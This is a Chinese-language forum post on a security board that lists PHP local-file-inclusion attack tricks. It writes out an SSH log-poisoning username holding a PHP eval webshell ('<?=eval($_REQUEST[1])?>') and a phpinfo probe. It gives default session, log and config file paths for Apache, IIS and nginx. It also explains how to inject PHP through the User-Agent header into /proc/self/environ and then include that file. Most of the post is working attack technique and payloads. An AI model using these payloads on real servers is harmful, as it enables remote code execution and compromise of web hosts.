991
1063
4315
论坛元老
ssh \'\<?=eval(\$_REQUEST[1])?>\'\@remotehost
这里include两次1.php文件,所以就会包含1.php两次。
1、session文件的保存路径可以在phpinfo的session.save_path看到。
2、默认路径: /var/lib/php/sess_PHPSESSID /var/lib/php/sess_PHPSESSID /tmp/sess_PHPSESSID /tmp/sessions/sess_PHPSESSID session的文件名格式为sess_[phpsessid]。而phpsessid在发送的请求的cookie字段中可以看到。\
1.apache+Linux日志默认路径:/etc/httpd/logs/accesslog或/var/log/httpd/accesslog 2.apache+win2003日志默认路径:D:\xampp\apache\logs\access.log、D:\xampp\apache\logs\error.log 3.IIS6.0+win2003默认日志文件:C:\WINDOWS\system32\Logfiles 4.IIS7.0+win2003 默认日志文件:%SystemDrive%\inetpub\logs\LogFiles 5.nginx 日志文件:日志文件在用户安装目录logs目录下,假设安装路径为/usr/local/nginx,那日志目录就是在/usr/local/nginx/logs下面
1.apache+linux 默认配置文件 /etc/httpd/conf/httpd.conf或/etc/init.d/httpd 2. IIS6.0+win2003 配置文件 C:/Windows/system32/inetsrv/metabase.xml 3. IIS7.0+WIN 配置文件 C:\Windows\System32\inetsrv\config\applicationHost.config
ssh \'\<?php phpinfo(); ?>\'\@remotehost 之后会提示输入密码,随便输入就可以。
environ文件默认位置: proc/self/environ
1.proc/self/environ中会保存user-agent头。如果在user-agent中插入php代码,则php代码会被写入到environ中。之后再包含它,即可。 2.例如我们现在访问一个网站,使用burpsuite抓包,将恶意代码插入到user-agent中。
使用道具 举报
本版积分规则 发表回复 回帖后跳转到最后一页
小黑屋|安全矩阵
GMT+8, 2024-11-28 18:47 , Processed in 0.019924 second(s), 18 queries .
Powered by Discuz! X4.0
Copyright © 2001-2020, Tencent Cloud.